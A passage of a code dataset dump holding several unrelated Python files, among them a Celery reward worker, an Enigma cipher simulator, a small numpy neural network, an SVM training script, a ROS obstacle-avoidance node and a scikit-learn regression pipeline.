+ data + SERVICE_KEY\n # print(politician_id, full_url)\n\n # try:\n tree = ET.ElementTree(file=urllib.request.urlopen(full_url))\n root = tree.getroot()\n\n items = root.find('body').find('items')\n\n for item in items:\n bill = {}\n","sub_path":"politician_api.py","file_name":"politician_api.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"132770232","text":"#!/usr/bin/python2.7\n# -*- coding: utf-8 -*-\n\nfrom celery import Celery,platforms\nfrom kombu import Exchange, Queue\nfrom celery import task\nfrom config import *\nimport json\nimport uuid\nimport datetime\nimport time\n\nONCE_CAPACITY = 1\n\napp = Celery(\"srjob.reward\", broker=amqp_url)\n\n\nplatforms.C_FORCE_ROOT = True\n\napp.conf.update(\n CELERY_TRACK_STARTED=True,\n CELERY_TASK_SERIALIZER='json',\n CELERY_ACCEPT_CONTENT=['json'], # Ignore other content\n CELERY_RESULT_SERIALIZER='json',\n CELERY_IMPORTS = (\"addsendapp\",\"preparesendapp\",\"dosendapp\",\"addJob\",\"addsendmail\",\"addsendmsg\",\"addsendsms\",\"addtask\",\"custinfosync\",\"custsync\",\"doreward\",\"dosendmail\",\"dosendmsg\",\"dosendsms\",\"findJob\",\"preparereward\",\"preparesendmail\",\"preparesendmsg\",\"preparesendsms\",\"sessionclose\",\"tagsync\",\"tasks\",\"usercheck\",)\n)\n\ndiff_time = time.timezone\ndef utc_now():\n return datetime.datetime.now() + datetime.timedelta(seconds=diff_time)\n\n@app.task(name=\"srjob.reward.addreward\")\ndef addreward(reward):\n redisdb = ensure_redis()\n\n task = json.loads(reward)\n if \"esttime\" in task.keys():\n esttime = task[\"esttime\"]\n if \"pointnum\" in task.keys():\n pointnum = task[\"pointnum\"]\n if \"sendtype\" in task.keys():\n sendtype = task[\"sendtype\"]\n if \"couponid\" in task.keys():\n couponid = task[\"couponid\"]\n if \"pointexdate\" in task.keys():\n pointexdate = task[\"pointexdate\"]\n if \"taskid\" in task.keys():\n task_id = task[\"taskid\"]\n if \"campaignid\" in task.keys():\n campaignid = task[\"campaignid\"]\n\n redisdb.hmset(\"reward:\"+str(task_id),{\n \"_id\": task_id,\n \"task\": \"reward\",\n \"arguments\": _decode_dict(task),\n \"campaignid\":campaignid,\n \"esttime\":esttime,\n \"creat_time\": utc_now(),\n \"isenable\":1,#1可用 0不可用\n \"prepare\":0,#1数据已准备 0数据未准备\n \"status\": \"STARTED\"\n })\n redisdb.rpush(\"reward\",\"reward:\"+str(task_id))\n\ndef _decode_dict(data):\n rv = {}\n for key, value in data.iteritems():\n if isinstance(key, unicode):\n key = key.encode('utf-8')\n if isinstance(value, unicode):\n value = value.encode('utf-8')\n elif isinstance(value, list):\n value = _decode_list(value)\n elif isinstance(value, dict):\n value = _decode_dict(value)\n rv[key] = value\n return rv\n\ndef _decode_list(data):\n rv = []\n for item in data:\n if isinstance(item, unicode):\n item = item.encode('utf-8')\n elif isinstance(item, list):\n item = _decode_list(item)\n elif isinstance(item, dict):\n item = _decode_dict(item)\n rv.append(item)\n return rv \n\n \n\nif __name__ == \"__main__\":\n # 使用sys.argv参数运行\n # app.worker_main()\n\n # 使用自定义参数运行\n # --beat同时开启beat模式,即运行按计划发送task的实例\n # 应确保全局只有一份同样的beat\n app.worker_main([\"worker\",\"--loglevel=debug\",\"-n\",\"addreward.%h\"])","sub_path":"addreward.py","file_name":"addreward.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"342732109","text":"import string\n\nrotorlist1 = list(\"EKMFLGDQVZNTOWYHXUSPAIBRCJ\")\nrotorlist2 = 
list(\"AJDKSIRUXBLHWTMCQGZNPYFVOE\")\nrotorlist3 = list(\"BDFHJLCPRTXVZNYEIWGAKMUSQO\")\nrotorlist4 = list(\"ESOVPZJAYQUIRHXLNFTGKDCMWB\")\nrotorlist5 = list(\"VZBRGITYUPSDNHLXAWMJQOFECK\")\nrotorlist6 = list(\"JPGVOUMFYQBENHZRDKASXLICTW\")\nrotorlist7 = list(\"NZJHGRCXMYSWBOUFAIVLPEKQDT\")\nrotorlist8 = list(\"FKQHTLXOCBJSPDZRAMEWNIUYGV\")\n\nalphabet = list(string.ascii_uppercase)\nrotor = dict()\nrotor[1] = {a:x for (a,x) in zip(alphabet, rotorlist1)}\nrotor[2] = {a:x for (a,x) in zip(alphabet, rotorlist2)}\nrotor[3] = {a:x for (a,x) in zip(alphabet, rotorlist3)}\nrotor[4] = {a:x for (a,x) in zip(alphabet, rotorlist4)}\nrotor[5] = {a:x for (a,x) in zip(alphabet, rotorlist5)}\n#rotor[6] = {a:x for (a,x) in zip(alphabet, rotorlist6)}\n#rotor[7] = {a:x for (a,x) in zip(alphabet, rotorlist7)}\n#rotor[8] = {a:x for (a,x) in zip(alphabet, rotorlist8)}\n\n# Create the inverse dictionaries\ninv_rotor = dict()\nfor i in range(1, 6):\n inv_rotor[i] = {v:k for k, v in rotor[i].items()}\n\nstepping = dict()\nstepping[1] = \"Q\"\nstepping[2] = \"E\"\nstepping[3] = \"V\"\nstepping[4] = \"J\"\nstepping[5] = \"Z\"\n\nreflectorlist = list(\"YRUHQSLDPXNGOKMIEBFZCWVJAT\")\nreflector = {a:x for (a,x) in zip(alphabet, reflectorlist)}\n\nclass Enigma:\n def __init__(self, rotor_order, ring_setting = \"AAA\", rotor_pos = \"AAA\", plugs = []):\n # note that rotor_pos should be of the form \"GJD\" \n # and ring_setting should be of the form \"SNK\"\n self.rotor_order = [int(x) for x in rotor_order]\n self.rotor_pos = list(rotor_pos)\n self.ring_setting = list(ring_setting)\n self.stecker_dict = {a:a for a in alphabet}\n for plug in plugs:\n self.stecker_dict[plug[0]] = plug[1]\n self.stecker_dict[plug[1]] = plug[0]\n\n @staticmethod\n def stepping_point(rotor_index):\n return stepping[rotor_index]\n\n # Cycles through capital letters in ascii.\n # i.e. A -> B, ..., Z -> A\n @staticmethod\n def increment_letter(letter):\n return chr((ord(letter)-65+1)%26+65)\n\n def add_to_letter(self, letter, increase):\n return chr((ord(letter)-65+increase)%26+65)\n\n @staticmethod\n def step_rotors_explicit(rotor_pos, middle_notch, right_notch):\n # Increment right rotor\n step_middle = (rotor_pos[2] == right_notch)\n step_left = (rotor_pos[1] == middle_notch)\n\n # Always step the fast rotor\n rotor_pos[2] = Enigma.increment_letter(rotor_pos[2])\n\n # Account for the double step. Middle rotor steps if the right rotor\n # is at the notch position, or if the left rotor steps, i.e. 
if the\n # middle rotor is at its notch position\n if step_middle or step_left:\n rotor_pos[1] = Enigma.increment_letter(rotor_pos[1])\n if step_left:\n rotor_pos[0] = Enigma.increment_letter(rotor_pos[0])\n return rotor_pos\n\n def step_rotors(self):\n self.rotor_pos = self.step_rotors_explicit(self.rotor_pos, stepping[self.rotor_order[1]], stepping[self.rotor_order[2]])\n\n # Applies the given rotors\n def apply_rotors(self, left_rotor, middle_rotor, right_rotor, plaintext_character):\n # Letter passes through the rotors right to left\n ciphered = self.apply_rotor(right_rotor, self.ring_setting[2], self.rotor_pos[2], plaintext_character)\n ciphered = self.apply_rotor(middle_rotor, self.ring_setting[1], self.rotor_pos[1], ciphered)\n ciphered = self.apply_rotor(left_rotor, self.ring_setting[0], self.rotor_pos[0], ciphered)\n # Passes through reflector\n ciphered = reflector[ciphered]\n # Passes through rotors left to right\n ciphered = self.apply_inverse_rotor(left_rotor, self.ring_setting[0], self.rotor_pos[0], ciphered)\n ciphered = self.apply_inverse_rotor(middle_rotor, self.ring_setting[1], self.rotor_pos[1], ciphered)\n ciphered = self.apply_inverse_rotor(right_rotor, self.ring_setting[2], self.rotor_pos[2], ciphered) \n return ciphered\n\n def apply_rotor(self, rotor_num, ring_setting, rotor_pos, plaintext_character):\n # calculate change thanks to rotor position\n change_pos = ord(rotor_pos)-65\n # calculate change thanks to ring setting\n change_setting = ord(ring_setting)-65\n increase = (change_pos - change_setting)%26\n\n ciphered = self.add_to_letter(plaintext_character, increase)\n ciphered = rotor[rotor_num][ciphered]\n ciphered = self.add_to_letter(ciphered, -increase)\n return ciphered\n\n def apply_inverse_rotor(self, rotor_num, ring_setting, rotor_pos, plaintext_character):\n # calculate change thanks to rotor position\n change_pos = ord(rotor_pos)-65\n # calculate change thanks to ring setting\n change_setting = ord(ring_setting)-65\n increase = (change_pos - change_setting)%26\n \n ciphered = self.add_to_letter(plaintext_character, increase)\n ciphered = inv_rotor[rotor_num][ciphered]\n ciphered = self.add_to_letter(ciphered, -increase)\n return ciphered\n\n def apply_steckerboard(self, stecker_dict, plaintext_character):\n return stecker_dict[plaintext_character]\n\n def cipher(self, letter):\n self.step_rotors()\n ciphered = self.apply_steckerboard(self.stecker_dict, letter)\n ciphered = self.apply_rotors(self.rotor_order[0], self.rotor_order[1], self.rotor_order[2], ciphered)\n ciphered = self.apply_steckerboard(self.stecker_dict, ciphered)\n return ciphered\n\n def print_with_spaces(self, text):\n # prints a chunk of text (assumed to be without spaces) with spaces\n # after every 5 characters\n count = 0\n for char in text:\n print(char, end=\"\")\n count += 1\n if (count % 5 == 0):\n print(\" \", end=\"\")\n print()\n\n\n def encrypt(self, text):\n # note that text cannot have spaces\n cipher_text = \"\"\n for char in text:\n cipher_text += self.cipher(char)\n return cipher_text \n \n","sub_path":"enigma.py","file_name":"enigma.py","file_ext":"py","file_size_in_byte":6087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"64381433","text":"import numpy as py\r\nimport random\r\ndef sigmoid(x):##sigmoid func will map any value to 0 to 1 range.it convert numbers into probablities \r\n return 1/(1+py.exp(-x))\r\ndef sigmoid_derivative(x):##this function is to generate derivative of an output\r\n return 
x*(1-x)\r\n\r\ntrainging_inputs=py.array([[0,0,1],\r\n [0,1,1],\r\n [1,0,1],\r\n [1,1,1]]) \r\ntrainging_output=py.array([[0,1,1,0]]).T##.T is for transpose of a matrix\r\npy.random.seed(1)##By using this func number will still be randomly distributed but they will be distributed exactly the same way each time we train\r\nsynaptic_weights=2*py.random.random((3,1))-1##generate random weights of dimension (3,1) beacuse we have 3 input and 1 output layer\r\nprint('weights:')\r\nprint(synaptic_weights)\r\nfor i in range(10000):\r\n input_layer=trainging_inputs\r\n output=sigmoid(py.dot(input_layer,synaptic_weights))##here we are taking dot prodect of two matrices and then putting it in sigmoid func\r\n error=trainging_output-output##Error can be found by subtracting actual output from predicted output\r\n adjustments=error*sigmoid_derivative(output)##here we are making adjusments w.r.t error\r\n synaptic_weights+=py.dot(input_layer.T,adjustments)##Here we are adding previous weights with dot product of(input_layer and adjusments) to update weights.\r\n \r\n\r\nprint(\"Updated final Weights:\")\r\nprint(synaptic_weights)\r\nprint('output after updated weights\\n')\r\nprint(output)\r\n","sub_path":"neural network.py","file_name":"neural network.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"263318245","text":"\n#################################################\n# Author : CIEL \n# Date : 2017-10-20\n# Function : 用平衡的数据集训练模型\n################################################# \n\n#载入需要的库\nimport numpy as np #科学计算库\nimport pandas as pd #数据分析\nimport os\n\nfrom sklearn import cross_validation #交叉验证库\nfrom sklearn import metrics\nfrom sklearn import datasets \nfrom sklearn import preprocessing \nfrom sklearn import neighbors \nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis \nfrom sklearn.ensemble import RandomForestClassifier #随机森林算法库\nfrom sklearn.grid_search import GridSearchCV\nfrom sklearn.model_selection import train_test_split \nfrom sklearn.model_selection import StratifiedKFold \nfrom sklearn import svm\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.svm import LinearSVC\nfrom sklearn.learning_curve import learning_curve\nfrom sklearn.cross_validation import cross_val_score\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\nfrom time import time \nfrom sklearn.naive_bayes import MultinomialNB \nfrom sklearn import tree \nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier \nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\nfrom sklearn.metrics import classification_report \nfrom sklearn.metrics import precision_recall_curve, roc_curve, auc \nfrom sklearn.externals import joblib\nimport matplotlib.pylab as plt\nfrom pandas import DataFrame\n\n# 读取原始数据的csv文件,生成训练集和验证集的数据字典\ndef setDict_train_validation(originDataFile):\n if os.path.exists(originDataFile):\n # 生成title\n listTitle = []\n #listTitle.append('ID')\n listTitle.append('class')\n for i in range(1, 343):\n listTitle.append('feature' + str(i))\n \n # read the csv file\n # pd.read_csv: 封装在DataFrame数据结构中\n dataMatrix = 
np.array(pd.read_csv(originDataFile, header=None, skiprows=1, names=listTitle))\n \n # 获取样本总数(rowNum)和每个样本的维度(colNum: 类别+特征,共343维)\n rowNum, colNum = dataMatrix.shape[0], dataMatrix.shape[1]\n \n sampleData = [] # 样本特征\n sampleClass = [] # 样本类别\n for i in range(0, rowNum): # 遍历全部样本\n #tolist():转为list类型\n tempList=dataMatrix[i,:].tolist() # 第i个样本\n #tempList = list(ddd) # 第i个样本\n sampleClass.append(tempList[0]) # 类别\n sampleData.append(tempList[1:]) # 特征\n sampleM = np.array(sampleData) # 二维矩阵,一行是一个样本,行数=样本总数,列数=样本特征数\n classM = np.array(sampleClass) # 一维列向量,每个元素是对应每个样本的所属类别\n \n # from sklearn.model_selection import StratifiedKFold\n # 调用StratifiedKFold生成训练集和测试集\n skf = StratifiedKFold(n_splits=5) #5折,每次分折都保持原数据集每个类别的样本百分比\n # 大括号{ }:代表dict字典数据类型,字典是由键对值组组成。冒号':'分开键和值,逗号','隔开组。\n setDict = {} # 创建字典,用于存储生成的训练集和测试集\n count = 1\n for trainI, testI, in skf.split(sampleM, classM): # skf.split:生成训练样本索引(trainI)和测试样本索引(testI)\n #print('trainI')\n #print(trainI.shape)\n #print('testI: %d')\n #print(testI.shape)\n \n # train1 = SVC1_train; test1 = validation_data\n \n trainSTemp = [] # 存储当前循环抽取出的训练样本特征\n trainCTemp = [] # 存储当前循环抽取出的训练样本类别\n testSTemp = [] # 存储当前循环抽取出的测试样本特征\n testCTemp = [] # 存储当前循环抽取出的测试样本类别\n \n # ------------------- 生成训练集 ------------------- \n # 第i折中训练数据:trainI\n trainIndex = trainI.tolist() # 训练样本索引\n for t1 in range(0, len(trainIndex)):\n trainNum = trainIndex[t1]\n trainSTemp.append((sampleM[trainNum, :]).tolist())\n trainCTemp.append(((classM)[trainNum]).tolist())\n # 第i折中测试数据:testI\n testIndex = testI.tolist() # 测试样本索引\n for t2 in range(0, len(testIndex)):\n testNum = testIndex[t2]\n testSTemp.append((sampleM[testNum, :]).tolist())\n testCTemp.append(((classM)[testNum]).tolist()) \n \n # 如果i=1,则生成训练数据和验证数据的字典\n if count == 1: \n # 生成训练数据\n setDict['trainFeature'] = np.array(trainSTemp) # 特征\n setDict['trainClass'] = np.array(trainCTemp) # 类别\n # 生成验证数据\n setDict['validationFeature'] = np.array(testSTemp) # 特征\n setDict['validationClass'] = np.array(testCTemp) # 类别\n \n #print(np.array(trainSTemp).shape)\n #print(np.array(trainCTemp).shape)\n #print(np.array(testSTemp).shape)\n #print(np.array(testCTemp).shape)\n \n else: # i不等于1,退出for循环\n break\n \n count += 1\n #print(setDict)\n return setDict\n else: #读取csv文件失败\n print('No such file or directory!') \n\n\n# 将训练集和验证集的字典分别写入csv文件,生成train.csv和validation.csv\nimport csv\ndef setCSV_train_validation(train_validation_dict, trainFile, validationFile):\n # ------------ train.csv ------------\n with open(trainFile, \"w\", newline=\"\") as train_file:\n csvWriter = csv.writer(train_file)\n # --------- 先写columns_name -----------\n columnsName = []\n columnsName.append('class')\n for i in range(1, 343):\n columnsName.append('feature' + str(i))\n csvWriter.writerow(columnsName)\n # ------------ 再写数据 --------------\n trainFeature = train_validation_dict['trainFeature']\n trainClass = train_validation_dict['trainClass']\n #print(trainClass.shape[0]) # 输出训练数据的样本数\n #print(trainFeature)\n #print(trainClass)\n for i in range(1, trainClass.shape[0] + 1): # 写train.csv的每行.trainClass.shape[0]为训练数据的样本数\n rowTemp = []\n rowTemp.append(trainClass[i-1])\n for j in range(0, 342):\n rowTemp.append(trainFeature[i-1, j])\n csvWriter.writerow(rowTemp)\n \n # ------------ validation.csv ------------\n with open(validationFile, \"w\", newline=\"\") as validation_file:\n csvWriter = csv.writer(validation_file)\n # --------- 先写columns_name -----------\n columnsName = []\n columnsName.append('class')\n for i in range(1, 343):\n columnsName.append('feature' 
+ str(i))\n csvWriter.writerow(columnsName)\n # ------------ 再写数据 --------------\n validationFeature = train_validation_dict['validationFeature']\n validationClass = train_validation_dict['validationClass']\n #print(validationClass.shape[0]) # 验证数据的样本数\n #print(validationFeature)\n #print(validationClass)\n for i in range(1, validationClass.shape[0] + 1): # validation.csv的每行.validationClass.shape[0]为验证数据的样本数\n rowTemp = []\n rowTemp.append(validationClass[i-1])\n for j in range(0, 342):\n rowTemp.append(validationFeature[i-1, j])\n csvWriter.writerow(rowTemp)\n\n# 读取train.csv文件,生成训练数据的字典,里面含k组采样数据\n# 函数返回一个字典:键为集合编号(trainFeature, trainClass)\ndef loadTrainDataDict(trainFile):\n if os.path.exists(trainFile):\n # 生成title\n listTitle = []\n listTitle.append('class')\n for i in range(1, 343): # 1~342\n listTitle.append('feature' + str(i))\n \n # read the csv file\n # pd.read_csv: 封装在DataFrame数据结构中\n dataMatrix = np.array(pd.read_csv(trainFile, header=None, skiprows=1, names=listTitle))\n \n # 获取样本总数(rowNum)和每个样本的维度(colNum: 类别+特征,共343维)\n rowNum, colNum = dataMatrix.shape[0], dataMatrix.shape[1]\n #print(rowNum)\n #print(colNum)\n \n sampleData = [] # 样本特征\n sampleClass = [] # 样本类别\n for i in range(0, rowNum): # 遍历全部样本\n #tolist():转为list类型\n tempList=dataMatrix[i,:].tolist() # 第i个样本\n sampleClass.append(tempList[0]) # 类别\n sampleData.append(tempList[1:]) # 特征\n sampleM = np.array(sampleData) # 二维矩阵,一行是一个样本,行数=样本总数,列数=样本特征数\n classM = np.array(sampleClass) # 一维列向量,每个元素是对应每个样本的所属类别\n \n setTrainDict = {} # 创建字典,用于存储生成的特征和类别\n setTrainDict['trainFeature'] = np.array(sampleM)\n setTrainDict['trainClass'] = np.array(classM)\n\n print (\"TrainDict:\")\n #print(np.array(sampleM).shape)\n #print(np.array(classM).shape)\n print(setTrainDict)\n \n return setTrainDict\n else: #读取csv文件失败\n print('No such file or directory!') \n \n \n# 读取validation.csv文件,生成验证数据的字典\n# 函数返回一个字典:键为集合编号(validationFeature, validationClass)\ndef loadValidationDataDict(validationFile):\n if os.path.exists(validationFile):\n # 生成title\n listTitle = []\n listTitle.append('class')\n for i in range(1, 343):\n listTitle.append('feature' + str(i))\n \n # read the csv file\n # pd.read_csv: 封装在DataFrame数据结构中\n dataMatrix = np.array(pd.read_csv(validationFile, header=None, skiprows=1, names=listTitle))\n \n # 获取样本总数(rowNum)和每个样本的维度(colNum: 类别+特征,共343维)\n rowNum, colNum = dataMatrix.shape[0], dataMatrix.shape[1]\n \n sampleData = [] # 样本特征\n sampleClass = [] # 样本类别\n for i in range(0, rowNum): # 遍历全部样本\n #tolist():转为list类型\n tempList=dataMatrix[i,:].tolist() # 第i个样本\n sampleClass.append(tempList[0]) # 类别\n sampleData.append(tempList[1:]) # 特征\n sampleM = np.array(sampleData) # 二维矩阵,一行是一个样本,行数=样本总数,列数=样本特征数\n classM = np.array(sampleClass) # 一维列向量,每个元素是对应每个样本的所属类别\n \n setValidationDict = {} # 创建字典,用于存储生成的特征和类别\n setValidationDict['validationFeature'] = np.array(sampleM)\n setValidationDict['validationClass'] = np.array(classM)\n\n print (\"ValidationDict:\")\n #print(np.array(sampleM).shape)\n #print(np.array(classM).shape)\n print(setValidationDict)\n \n return setValidationDict\n else: #读取csv文件失败\n print('No such file or directory!') \n \n#支持向量机(Support Vector Machine):SVC \ndef SVC(): \n # 将probability设为True,可以计算每个样本到各个类别的概率\n # 20170926:全部采用默认参数\n #clf = svm.SVC(probability = True) \n \n # 20171020:采用rbf核函数,C和gamma为libsvm的寻优结果\n clf = svm.SVC(kernel='rbf', random_state=0, gamma=0.0001220703125, C=2048.0)\n return clf \n\n\n# 计算识别率\n# modelClass为模型判断的类别,preClass为先验类别\ndef getRecognitionRate(modelClass, preClass):\n validationNum = 
len(modelClass) # 验证集大小\n rightNum =0 # 分类正确的验证样本个数\n # print('验证集大小')\n # print(validationNum)\n for i in range(0, validationNum):\n if modelClass[i] == preClass[i]:\n rightNum += 1\n # print('正确分类的样本数')\n # print(rightNum)\n return float(rightNum)/ float(validationNum)\n\n# SVC模型的训练\ndef SVC_model(trainDict, validationDict): # 输入参数为:训练集的字典,验证集的字典\n # 获取第i个SVC分类器 \n clf_SVC = SVC() \n \n #SVC_rate = 0.0 # SVC_rate用于将每个SVC模型的所有识别率累加\n SVC_predict_result = [] # SVC_predict_result记录每个SVC模型对验证数据所属类别的判断\n \n # 训练数据\n trainFeatureMatrix = trainDict['trainFeature'] #训练数据的特征\n trainClass = trainDict['trainClass'] #训练数据的类别\n #print(trainFeatureMatrix)\n #print(trainClass)\n \n start = time()\n print('start training model ...')\n \n #训练SVC模型\n clf_SVC.fit(trainFeatureMatrix, trainClass)\n \n # 保存模型\n print('saving SVC model ...')\n joblib.dump(clf_SVC, 'clf.model')\n \n end = time()\n print('用时 %.5f seconds.' % (end-start))\n \n# 加载模型,并预测数据\n# dataDict为验证样本的数据字典\ndef predictClass_new(validationDict): \n # 验证数据\n validationFeatureMatrix = validationDict['validationFeature'] #特征\n validationClass = validationDict['validationClass'] #类别\n \n # 加载SVC模型\n print('加载SVC模型')\n SVCmodel = joblib.load('clf.model')\n \n #计算SVC模型对验证数据的类别判断结果\n SVCpredictClass = SVCmodel.predict(validationFeatureMatrix) # predict(X): 返回X的分类(二分类,返回0和1)\n SVC_predict_result = SVCpredictClass.tolist()\n #print('SVC_predict_clf_result')\n #print(SVC_predict_result) \n \n # ----------------------------- 模型表现 ----------------------------- \n # classification_report():打印分类结果报告\n print('\\n')\n print('SVC classification report')\n print(classification_report(validationClass, SVC_predict_result, target_names = ['neg', 'pos']))\n SVC_rate = getRecognitionRate(SVC_predict_result, validationClass) # 验证集的识别率\n print(\"SVC precision:\", SVC_rate)\n \n\ndef main():\n '''\n # --------------------- step1. 生成训练集的csv文件(train.csv)和验证集的csv文件(validation.csv) ---------------------\n # 原始数据的csv文件\n #originDataFile = 'F:\\Code\\bagging-light-classification\\\\originData.csv' #注意:该csv文件没有'ID'列\n originDataFile = 'originData.csv' #注意:该csv文件没有'ID'列\n '''\n # 生成的训练集csv文件和验证集csv文件\n #trainDataFile = 'F:\\Code\\bagging-light-classification\\\\train.csv' #注意:该csv文件没有'ID'列\n #validationDataFile = 'F:\\Code\\bagging-light-classification\\\\validation.csv' #注意:该csv文件没有'ID'列\n trainDataFile = '20170925BalanceTrain.csv' #注意:该csv文件没有'ID'列\n validationDataFile = 'validation.csv' #注意:该csv文件没有'ID'列\n \n '''\n # --------------------- 如果已经生成了train.csv和validation.csv就没有必要执行下面两行程序 -----------------\n print('生成训练集的csv文件和验证集的csv文件') \n originDict = setDict_train_validation(originDataFile)\n setCSV_train_validation(originDict, trainDataFile, validationDataFile)\n '''\n \n # --------------------- step2. 生成训练集和验证集的数据字典 ---------------------\n print('生成训练数据字典')\n # 生成训练集的数据字典\n trainDict = loadTrainDataDict(trainDataFile)\n\n print('生成验证数据字典')\n # 生成验证集的数据字典:{ validationFeature, validationClass }\n validationDict = loadValidationDataDict(validationDataFile)\n \n # --------------------- step3. 训练模型,SVC ---------------------\n print('start training SVC model')\n SVC_model(trainDict, validationDict)\n \n # --------------------- step4. 
加载SVC模型,对验证集进行验证 ---------------------\n    print('验证模型')\n    predictClass_new(validationDict)\n    \n# 在python编译器读取源文件的时候会执行它找到的所有代码,\n# 而在执行之前会根据当前运行的模块是否为主程序而定义变量__name__的值为__main__还是模块名。\n# 因此,该判断语句为真的时候,说明当前运行的脚本为主程序,而非主程序所引用的一个模块。\n# 这在当你想要运行一些只有在将模块当做程序运行时而非当做模块引用时才执行的命令,只要将它们放到if __name__ == \"__main__:\"判断语句之后就可以了。\nif __name__ == '__main__': \n    start = time()\n    # print('开始训练模型\\n')\n    \n    main()\n    \n    print('\\n')\n    # print('训练结束')\n    end = time()\n    print('用时 %.5f seconds.' % (end-start))\n\n\n\n\n\n\n\n","sub_path":"SVC_clf/20171020+SVC_clf+with pixel pos.py","file_name":"20171020+SVC_clf+with pixel pos.py","file_ext":"py","file_size_in_byte":17665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"585769061","text":"#!/usr/bin/env python\nimport rospy\nfrom std_msgs.msg import Float32\nfrom std_msgs.msg import Int32\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import Range\nfrom custom_msg.msg import ultrasonic_msg\nfrom custom_msg.msg import obavoid_flag_x_z\nmessage = obavoid_flag_x_z()\n[r1,r2,r3]=[0.0,0.0,0.0]\ndef f1(msg,pub):\n\tglobal r1,r2,r3\n\tr1=msg.r1\n\tr2=msg.r2\n\tr3=msg.r3\n\tob_avoid(pub)\n\ndef forward():\n\tmessage.x = 0.7\n\tmessage.z = 0\ndef stop():\n\tmessage.x = 0\n\tmessage.z = 0\ndef backward():\n\tmessage.x = -0.7\n\tmessage.z = 0\ndef backward_right():\n\tmessage.x = -0.2\n\tmessage.z = -0.2\ndef sharp_right_turn(): \n\tmessage.x = 0\n\tmessage.z = -0.5\n\t\ndef sharp_left_turn():\n\tmessage.x = 0\n\tmessage.z = 0.5\n\ndef soft_right_turn(): \n\tmessage.x = 0.7\n\tmessage.z = -0.5\n\t\ndef soft_left_turn():\n\tmessage.x = 0.7\n\tmessage.z = 0.5\n\ndef ob_avoid(pub):\n\tglobal r1,r2,r3,message\n\tif r1>2.5 and r2>2.5 and r3>2.5:\n\t\tforward()\n\t\tmessage.flag=1\n\t\tprint(\"...going forward\")\t\t\t\n\telif r1<2.5 and r2<2.5 and r3<2.5:\n\t\tbackward()\n\t\tmessage.flag=0\n\t\tprint(\"...going backward\")\n\telif r1>2.5 and r2>2.5 and r3<2.5:\n\t\tsoft_left_turn()\n\t\tmessage.flag=0\n\t\tprint(\"...soft left turn\")\n\telif r1<2.5 and r2>2.5 and r3>2.5:\n\t\tsoft_right_turn()\n\t\tmessage.flag=0\n\t\tprint(\"...soft right turn\")\n\telif r1>2.5 and r2<2.5 and r3<2.5:\n\t\tsharp_left_turn()\n\t\tmessage.flag=0\n\t\tprint(\"...sharp left turn\")\n\telif r1<2.5 and r2<2.5 and r3>2.5:\n\t\tsharp_right_turn()\n\t\tmessage.flag=0\n\t\tprint(\"...sharp right turn\")\n\telif r1>2.5 and r2<2.5 and r3>2.5:\n\t\tsharp_right_turn()\n\t\tmessage.flag=0\n\t\tprint(\"...sharp right turn\")\n\telif r1<4 and r2>2.5 and r3<4:\n\t\tforward()\n\t\tmessage.flag=1\n\t\tprint(\"***going forward\")\n\telif r1<1.5 and r2>2.5 and r3<1.5:\n\t\tbackward_right()\n\t\tmessage.flag=0\n\t\tprint(\"***going backward_right\")\n \t\t#print(\"***going backward_right\")\n\telse:\n\t\tforward()\n\t\tmessage.flag=1\n\t\tprint(\"...going forward\")\t\t\n\tpub.publish(message)\n\nrospy.init_node('ob_avoid5', anonymous=True)\npub = rospy.Publisher('/obavoid_flag_x_z_topic', obavoid_flag_x_z, queue_size=50)\t\nultrasonic_msg_sub = rospy.Subscriber('/ultrasonic_msg_topic',ultrasonic_msg,f1,pub)\nrospy.spin()\n\n\n","sub_path":"envision/src/bot/src/obavoid5.py","file_name":"obavoid5.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"550430722","text":"from sklearn.pipeline import Pipeline\nfrom sklearn.linear_model import Lasso\nfrom sklearn.preprocessing import MinMaxScaler\nfrom regression_model import preprocessors as pp\nfrom 
regression_model.config import configuracion\n\n\npreprocessor_pipe = Pipeline(\n [\n ('categorical_imputer',\n pp.CategoricalImputer(variables=configuracion.CATEGORICAL_VARS_WITH_NA)),\n ('numerical_inputer',\n pp.NumericalImputer(variables=configuracion.NUMERICAL_VARS_WITH_NA)),\n ('temporal_variable',\n pp.TemporalVariableEstimator(\n variables=configuracion.TEMPORAL_VARS,\n reference_variable=configuracion.DROP_FEATURES)),\n ('rare_label_encoder',\n pp.RareLabelCategoricalEncoder(\n tol=0.01,\n variables=configuracion.CATEGORICAL_VARS)),\n ('categorical_encoder',\n pp.CategoricalEncoder(variables=configuracion.CATEGORICAL_VARS)),\n ('log_transformer',\n pp.LogTransformer(variables=configuracion.NUMERICALS_LOG_VARS)),\n ('drop_features',\n pp.DropUnecessaryFeatures(variables_to_drop=configuracion.DROP_FEATURES)),\n ('scaler', MinMaxScaler()),\n ('Linear_model', Lasso(alpha=0.005, random_state=0))\n ]\n)\n\n\n\n","sub_path":"build/lib/regression_model/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"74042019","text":"'''\nImplement a basic calculator to evaluate a simple expression string.\n\nThe expression string may contain open ( and closing parentheses ), the plus + or minus sign -, 